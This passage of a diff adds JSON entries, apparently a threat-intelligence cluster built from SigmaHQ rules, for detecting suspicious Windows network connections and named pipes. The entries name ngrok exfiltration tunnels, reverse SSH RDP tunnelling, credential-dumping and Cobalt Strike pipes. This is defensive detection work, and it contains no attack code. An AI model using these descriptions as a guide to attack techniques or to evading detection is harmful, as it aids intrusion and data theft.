"level": "high", + "falsepositive": [ + "Legitimate use of ngrok.io" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "uuid": "1d08ac94-400d-4469-a82f-daee9a908849", + "value": "Communication To Ngrok Tunneling Service", + "meta": { + "refs": [ + "https://twitter.com/hakluke/status/1587733971814977537/photo/1", + "https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_ngrok_tunnel.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.command_and_control", + "attack.t1567", + "attack.t1568.002", + "attack.t1572", + "attack.t1090", + "attack.t1102", + "attack.s0508" + ], + "creation_date": "2022/11/03", + "filename": "net_connection_win_ngrok_tunnel.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use of ngrok" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious network connection by Notepad", + "uuid": "e81528db-fc02-45e8-8e98-4e84aba1f10b", + "value": "Notepad Making Network Connection", + "meta": { + "refs": [ + "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492186586.pdf", + "https://blog.cobaltstrike.com/2013/08/08/why-is-notepad-exe-connecting-to-the-internet/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_notepad_network_connection.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.execution", + "attack.defense_evasion", + "attack.t1055" + ], + "creation_date": "2020/05/14", + "filename": "net_connection_win_notepad_network_connection.yml", + "author": "EagleEye Team", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects a Powershell process that opens network connections - check for suspicious target ports and target systems - adjust to your environment (e.g. 
extend filters with company's ip range')", + "uuid": "1f21ec3f-810d-4b0e-8045-322202e22b4b", + "value": "PowerShell Network Connections", + "meta": { + "refs": [ + "https://www.youtube.com/watch?v=DLtJTxMWZ2o", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_powershell_network_connection.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2017/03/13", + "filename": "net_connection_win_powershell_network_connection.yml", + "author": "Florian Roth", + "level": "low", + "falsepositive": [ + "Administrative scripts", + "Microsoft IP range" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", + "uuid": "bef0bc5a-b9ae-425d-85c6-7b2d705980c6", + "value": "Python Initiated Connection", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python", + "https://pypi.org/project/scapy/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_python.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ], + "creation_date": "2021/12/10", + "filename": "net_connection_win_python.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate python script" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", + "uuid": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", + "value": "RDP Over Reverse SSH Tunnel", + "meta": { + "refs": [ + "https://twitter.com/SBousseaden/status/1096148422984384514", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_reverse_tunnel.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" + ], + "creation_date": "2019/02/16", + "filename": "net_connection_win_rdp_reverse_tunnel.yml", + "author": "Samir Bousseaden", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", + "uuid": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", + "value": "RDP to HTTP or HTTPS Target Ports", + "meta": { + "refs": [ + "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", + "https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_to_http.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" + ], + "creation_date": "2022/04/29", + "filename": "net_connection_win_rdp_to_http.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "uuid": "c7e91a02-d771-4a6d-a700-42587e0b1095", + "value": "Regsvr32 Network Activity", + "meta": { + "refs": [ + "https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/", + "https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml" + ], + "tags": [ + 
"attack.execution", + "attack.t1559.001", + "attack.defense_evasion", + "attack.t1218.010" + ], + "creation_date": "2019/10/25", + "filename": "net_connection_win_regsvr32_network_activity.yml", + "author": "Dmitriy Lifanov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", + "uuid": "c539afac-c12a-46ed-b1bd-5a5567c9f045", + "value": "Remote PowerShell Session (Network)", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_remote_powershell_session_network.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" + ], + "creation_date": "2019/09/12", + "filename": "net_connection_win_remote_powershell_session_network.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "level": "high", + "falsepositive": [ + "Legitimate usage of remote PowerShell, e.g. 
remote administration and monitoring.", + "Network Service user name of a not-covered localization" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects a rundll32 that communicates with public IP addresses", + "uuid": "cdc8da7d-c303-42f8-b08c-b4ab47230263", + "value": "Rundll32 Internet Connection", + "meta": { + "refs": [ + "https://www.hybrid-analysis.com/sample/759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011", + "attack.execution" + ], + "creation_date": "2017/11/04", + "filename": "net_connection_win_rundll32_net_connections.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Communication to other corporate systems that use IP addresses from public address spaces" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects a script interpreter wscript/cscript opening a network connection. 
Adversaries may use script to download malicious payloads.", + "uuid": "08249dc0-a28d-4555-8ba5-9255a198e08c", + "value": "Script Initiated Connection", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_script.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2022/08/28", + "filename": "net_connection_win_script.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate scripts" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.", + "uuid": "992a6cae-db6a-43c8-9cec-76d7195c96fc", + "value": "Script Initiated Connection to Non-Local Network", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_script_wan.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2022/08/28", + "filename": "net_connection_win_script_wan.yml", + "author": "frack113, Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate scripts" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects a possible remote connections to Silenttrinity c2", + "uuid": "50e54b8d-ad73-43f8-96a1-5191685b17a4", + "value": "Silenttrinity Stager Msbuild Activity", + "meta": { + "refs": [ + "https://www.blackhillsinfosec.com/my-first-joyride-with-silenttrinity/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml" + ], + "tags": [ + "attack.execution", + "attack.t1127.001" + ], + "creation_date": "2020/10/11", + "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml", + "author": "Kiran kumar s, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", + "uuid": "20384606-a124-4fec-acbb-8bd373728613", + "value": "Suspicious Network Connection Binary No CommandLine", + "meta": { + "refs": [ + "https://redcanary.com/blog/raspberry-robin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_binary_no_cmdline.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/07/03", + "filename": "net_connection_win_susp_binary_no_cmdline.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious network connection by Cmstp", + "uuid": "efafe0bf-4238-479e-af8f-797bd3490d2d", + "value": "Cmstp Making Network Connection", + "meta": { + "refs": [ + "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_cmstp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.003" + ], + "creation_date": "2022/08/30", + "filename": "net_connection_win_susp_cmstp.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + 
"logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", + "uuid": "25eabf56-22f0-4915-a1ed-056b8dae0a68", + "value": "Suspicious Dropbox API Usage", + "meta": { + "refs": [ + "https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb", + "https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_dropbox_api.yml" + ], + "tags": "No established tags", + "creation_date": "2022/04/20", + "filename": "net_connection_win_susp_dropbox_api.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use of the API with a tool that the author wasn't aware of" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", + "uuid": "628d7a0b-7b84-4466-8552-e6138bc03b43", + "value": "Suspicious Epmap Connection", + "meta": { + "refs": [ + "https://github.com/RiccardoAncarani/TaskShell/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_epmap.yml" + ], + "tags": [ + "attack.lateral_movement" + ], + "creation_date": "2022/07/14", + "filename": "net_connection_win_susp_epmap.yml", + "author": "frack113, Tim Shelton (fps)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "uuid": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", + "value": "Suspicious Outbound Kerberos Connection", + "meta": { + "refs": [ + 
"https://github.com/GhostPack/Rubeus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_kerberos_connection.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558", + "attack.lateral_movement", + "attack.t1550.003" + ], + "creation_date": "2019/10/24", + "filename": "net_connection_win_susp_outbound_kerberos_connection.yml", + "author": "Ilyas Ochkov, oscd.community", + "level": "high", + "falsepositive": [ + "Other browsers" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious connections from Microsoft Sync Center to non-private IPs.", + "uuid": "9f2cc74d-78af-4eb2-bb64-9cd1d292b87b", + "value": "Microsoft Sync Center Suspicious Network Connections", + "meta": { + "refs": [ + "https://redcanary.com/blog/intelligence-insights-november-2021/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_mobsync_connection.yml" + ], + "tags": [ + "attack.t1055", + "attack.t1218", + "attack.execution", + "attack.defense_evasion" + ], + "creation_date": "2022/04/28", + "filename": "net_connection_win_susp_outbound_mobsync_connection.yml", + "author": "elhoim", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", + "uuid": "9976fa64-2804-423c-8a5b-646ade840773", + "value": "Suspicious Outbound SMTP Connections", + "meta": { + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", + "https://www.ietf.org/rfc/rfc2821.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ], + "creation_date": "2022/01/07", + "filename": "net_connection_win_susp_outbound_smtp_connections.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Other SMTP tools" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects programs with network connections running in suspicious files system locations", + "uuid": "7b434893-c57d-4f41-908d-6a17bf1ae98f", + "value": "Suspicious Program Location with Network Connections", + "meta": { + "refs": [ + "https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2017/03/19", + "filename": "net_connection_win_susp_prog_location_network_connection.yml", + "author": "Florian Roth, Tim Shelton", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects Non-Standard Tools Connecting to TCP port 3389 indicating possible lateral movement", + "uuid": "ed74fe75-7594-4b4b-ae38-e38e3fd2eb23", + "value": "Suspicious Outbound RDP Connections", + "meta": { + "refs": [ + "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_rdp.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" + ], + "creation_date": "2019/05/15", + "filename": "net_connection_win_susp_rdp.yml", + "author": "Markus Neis", + "level": "high", + "falsepositive": [ + "Other Remote Desktop RDP tools", + "Domain controller using dns.exe" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making a network connections.\nOne could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.\n", + "uuid": "c649a6c7-cd8c-4a78-9c04-000fc76df954", + "value": "Wuauclt Network Connection", + "meta": { + "refs": [ + "https://dtm.uk/wuauclt/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2020/10/12", + "filename": "net_connection_win_wuauclt_network_connection.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "medium", + "falsepositive": [ + "Legitimate use of wuauclt.exe over the network." 
+ ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "uuid": "58cb02d5-78ce-4692-b3e1-dce850aae41a", + "value": "Alternate PowerShell Hosts Pipe", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_alternate_powershell_hosts_pipe.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/09/12", + "filename": "pipe_created_alternate_powershell_hosts_pipe.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "level": "medium", + "falsepositive": [ + "Programs using PowerShell directly without invocation of a dedicated interpreter." + ], + "logsource.category": "pipe_created", + "logsource.product": "windows" + } + }, + { + "description": "Detects a named pipe used by Turla group samples", + "uuid": "739915e4-1e70-4778-8b8a-17db02f66db1", + "value": "Turla Group Named Pipes", + "meta": { + "refs": [ + "Internal Research", + "https://attack.mitre.org/groups/G0010/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_apt_turla_namedpipes.yml" + ], + "tags": [ + "attack.g0010", + "attack.execution", + "attack.t1106" + ], + "creation_date": "2017/11/06", + "filename": "pipe_created_apt_turla_namedpipes.yml", + "author": "Markus Neis", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "pipe_created", + "logsource.product": "windows" + } + }, + { + "description": "Detects well-known credential dumping tools execution via specific named pipes", + "uuid": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", + "value": "Cred Dump-Tools Named Pipes", + "meta": { + "refs": [ + 
"https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_cred_dump_tools_named_pipes.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005" + ], + "creation_date": "2019/11/01", + "filename": "pipe_created_cred_dump_tools_named_pipes.yml", + "author": "Teymur Kheirkhabarov, oscd.community", + "level": "critical", + "falsepositive": [ + "Legitimate Administrator using tool for password recovery" + ], + "logsource.category": "pipe_created", + "logsource.product": "windows" + } + }, + { + "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", + "uuid": "1f7025a6-e747-4130-aac4-961eb47015f1", + "value": "DiagTrackEoP Default Named Pipe", + "meta": { + "refs": [ + "https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L22", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_diagtrack_eop_default_pipe.yml" + ], + "tags": [ + "attack.privilege_escalation" + ], + "creation_date": "2022/08/03", + "filename": "pipe_created_diagtrack_eop_default_pipe.yml", + "author": "Nasreddine Bencherchali", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "pipe_created", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", + "uuid": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", + "value": "EfsPotato Named Pipe", + "meta": { + "refs": [ + "https://twitter.com/SBousseaden/status/1429530155291193354?s=20", + "https://github.com/zcgonvh/EfsPotato", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_efspotato_namedpipe.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ], + 
"creation_date": "2021/08/23", + "filename": "pipe_created_efspotato_namedpipe.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "pipe_created", + "logsource.product": "windows" + } + }, + { + "description": "Detects creation of default named pipes used by the Koh tool", + "uuid": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", + "value": "Koh Default Named Pipes", + "meta": { + "refs": [ + "https://github.com/GhostPack/Koh/blob/0283d9f3f91cf74732ad377821986cfcb088e20a/Clients/BOF/KohClient.c#L12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_koh_default_pipe.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1528", + "attack.t1134.001" + ], + "creation_date": "2022/07/08", + "filename": "pipe_created_koh_default_pipe.yml", + "author": "Nasreddine Bencherchali", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "pipe_created", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of a named pipe as used by CobaltStrike", + "uuid": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", + "value": "CobaltStrike Named Pipe", + "meta": { + "refs": [ + "https://twitter.com/d4rksystem/status/1357010969264873472", + "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/", + "https://github.com/Neo23x0/sigma/issues/253", + "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/", + "https://redcanary.com/threat-detection-report/threats/cobalt-strike/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_cobaltstrike.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ], + "creation_date": "2021/05/25", + "filename": "pipe_created_mal_cobaltstrike.yml", + "author": "Florian Roth, Wojciech Lesicki", + "level": 
"critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "pipe_created", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", + "uuid": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", + "value": "CobaltStrike Named Pipe Pattern Regex", + "meta": { + "refs": [ + "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", + "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_cobaltstrike_re.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ], + "creation_date": "2021/07/30", + "filename": "pipe_created_mal_cobaltstrike_re.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "pipe_created", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of a named pipe used by known APT malware", + "uuid": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", + "value": "Malicious Named Pipe", + "meta": { + "refs": [ + "https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/", + "https://securelist.com/faq-the-projectsauron-apt/75533/", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.us-cert.gov/ncas/alerts/TA17-117A", + "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", + "https://thedfirreport.com/2020/06/21/snatch-ransomware/", + "https://github.com/RiccardoAncarani/LiquidSnake", + "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a", + 
"https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf", + "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/", + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_namedpipes.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ], + "creation_date": "2017/11/06", + "filename": "pipe_created_mal_namedpipes.yml", + "author": "Florian Roth, blueteam0ps, elhoim", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "pipe_created", + "logsource.product": "windows" + } + }, + { + "description": "Detects PAExec default named pipe", + "uuid": "f6451de4-df0a-41fa-8d72-b39f54a08db5", + "value": "PAExec Default Named Pipe", + "meta": { + "refs": [ + "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Command%20and%20Control/C2-NamedPipe.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_paexec_default_pipe.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ], + "creation_date": "2022/10/26", + "filename": "pipe_created_paexec_default_pipe.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "pipe_created", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of PowerShell via creation of named pipe starting with PSHost", + "uuid": "ac7102b4-9e1e-4802-9b4f-17c5524c015c", + "value": "PowerShell Execution Via Named Pipe", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_powershell_execution_pipe.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/09/12", + "filename": "pipe_created_powershell_execution_pipe.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "informational", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "pipe_created", + "logsource.product": "windows" + } + }, + { + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "uuid": "f3f3a972-f982-40ad-b63c-bca6afdfad7c", + "value": "PsExec Default Named Pipe", + "meta": { + "refs": [ + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_psexec_default_pipe.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ], + "creation_date": "2017/06/12", + "filename": "pipe_created_psexec_default_pipe.yml", + "author": "Thomas Patzke", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "pipe_created", + "logsource.product": "windows" + } + }, + { + "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. 
Which could indicate that the tool is being used in an attack", + "uuid": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", + "value": "PsExec Tool Execution From Suspicious Locations - PipeName", + "meta": { + "refs": [ + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_psexec_default_pipe_from_susp_location.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ], + "creation_date": "2022/08/04", + "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Rare legitimate use of psexec from the locations mentioned above" + ], + "logsource.category": "pipe_created", + "logsource.product": "windows" + } + }, + { + "description": "Detecting use PsExec via Pipe Creation/Access to pipes", + "uuid": "9e77ed63-2ecf-4c7b-b09d-640834882028", + "value": "PsExec Pipes Artifacts", + "meta": { + "refs": [ + "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_psexec_pipes_artifacts.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.execution", + "attack.t1569.002" + ], + "creation_date": "2020/05/10", + "filename": "pipe_created_psexec_pipes_artifacts.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate Administrator activity" + ], + "logsource.category": "pipe_created", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", + "uuid": 
